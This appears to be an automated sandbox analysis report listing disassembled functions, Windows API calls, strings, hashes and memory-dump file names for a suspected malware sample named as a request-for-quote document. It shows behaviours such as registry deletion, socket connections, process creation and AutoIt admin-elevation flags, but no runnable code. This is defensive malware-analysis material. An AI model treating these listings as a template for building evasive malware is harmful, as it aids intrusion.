GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D

Strings

,,I, xrefs: 0045D578
DllGetClassObject, xrefs: 0045D610

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,I$DllGetClassObject
API String ID: 753597075-1683996018
Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8

Function 00463671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4

lstrcmpiW.KERNEL32(?,?), ref: 004636B7
_wcscmp.LIBCMT ref: 004636D3
MoveFileW.KERNEL32(?,?), ref: 004636EB
_wcscat.LIBCMT ref: 00463733
SHFileOperationW.SHELL32(?), ref: 0046379F

Strings

\*.*, xrefs: 0046372D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
Opcode Fuzzy Hash: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B

Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004872AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
IsMenu.USER32(?), ref: 00487369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
DrawMenuBar.USER32 ref: 004873C4

Strings

0, xrefs: 0048729E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65

Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
FreeLibrary.KERNEL32(00000000), ref: 004810B5

Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9

Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
GetWindowLongW.USER32(00C11C90,000000F0), ref: 0048631F
GetWindowLongW.USER32(00C11C90,000000F0), ref: 00486354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59

Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
WSAGetLastError.WSOCK32(00000000), ref: 004761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
connect.WSOCK32(00000000,?,00000010), ref: 00476217
WSAGetLastError.WSOCK32 ref: 00476221
closesocket.WSOCK32(00000000), ref: 0047624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65

Function 0045F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0045F671
__wcsnicmp.LIBCMT ref: 0045F692
__wcsnicmp.LIBCMT ref: 0045F6AC

Strings

#requireadmin, xrefs: 0045F68C
#notrayicon, xrefs: 0045F669
#OnAutoItStartRegister, xrefs: 0045F6A6

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 659df752051c6ea00e2ad20bc59bb8864dd8c715ed7b4aab4cd92ca4da0ea462
Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
Opcode Fuzzy Hash: 659df752051c6ea00e2ad20bc59bb8864dd8c715ed7b4aab4cd92ca4da0ea462
Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F

Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665

Strings

Msctls_Progress32, xrefs: 00487603

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8

Function 0048B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048B644
_memset.LIBCMT ref: 0048B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
CloseHandle.KERNEL32 ref: 0048B694

Strings

doL, xrefs: 0048B64D
oL, xrefs: 0048B63E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oL$doL
API String ID: 3277943733-3421622115
Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC

Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
GetProcAddress.KERNEL32(00000000), ref: 0042408C
EncodePointer.KERNEL32(00000000), ref: 00424097
DecodePointer.KERNEL32(00423F85), ref: 004240B2

Strings

combase.dll, xrefs: 00424080
RoUninitialize, xrefs: 00424074

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C

Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046660B
_memmove.LIBCMT ref: 00466546

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

_memmove.LIBCMT ref: 004665B9
_memmove.LIBCMT ref: 004666A0
_memmove.LIBCMT ref: 004666B9
_memmove.LIBCMT ref: 004666D5

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 51a45bc3aac73b5925831bdb2cc0ae750d8c4569182fdfc8ffca3aca7653bc8e
Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
Opcode Fuzzy Hash: 51a45bc3aac73b5925831bdb2cc0ae750d8c4569182fdfc8ffca3aca7653bc8e
Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A

Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
RegCloseKey.ADVAPI32(00000000), ref: 00480399

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: fefe7021bd13272d342d548016585d1103e2862b00761a5e9b4cc70dfac6524c
Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
Opcode Fuzzy Hash: fefe7021bd13272d342d548016585d1103e2862b00761a5e9b4cc70dfac6524c
Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56

Function 00485799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004857FB
GetMenuItemCount.USER32(00000000), ref: 00485832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
GetMenuItemID.USER32(?,?), ref: 004858C9
GetSubMenu.USER32(?,?), ref: 004858D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 73639969320bcf294b28ac30933794d544fe89b2342f071dccb852350aa2c6a7
Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
Opcode Fuzzy Hash: 73639969320bcf294b28ac30933794d544fe89b2342f071dccb852350aa2c6a7
Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99

Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045EF06
VariantClear.OLEAUT32(00000013), ref: 0045EF78
VariantClear.OLEAUT32(00000000), ref: 0045EFD3
_memmove.LIBCMT ref: 0045EFFD
VariantClear.OLEAUT32(?), ref: 0045F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94

Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
IsMenu.USER32(00000000), ref: 004622C3
CreatePopupMenu.USER32 ref: 004622F7
GetMenuItemCount.USER32(000000FF), ref: 00462355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

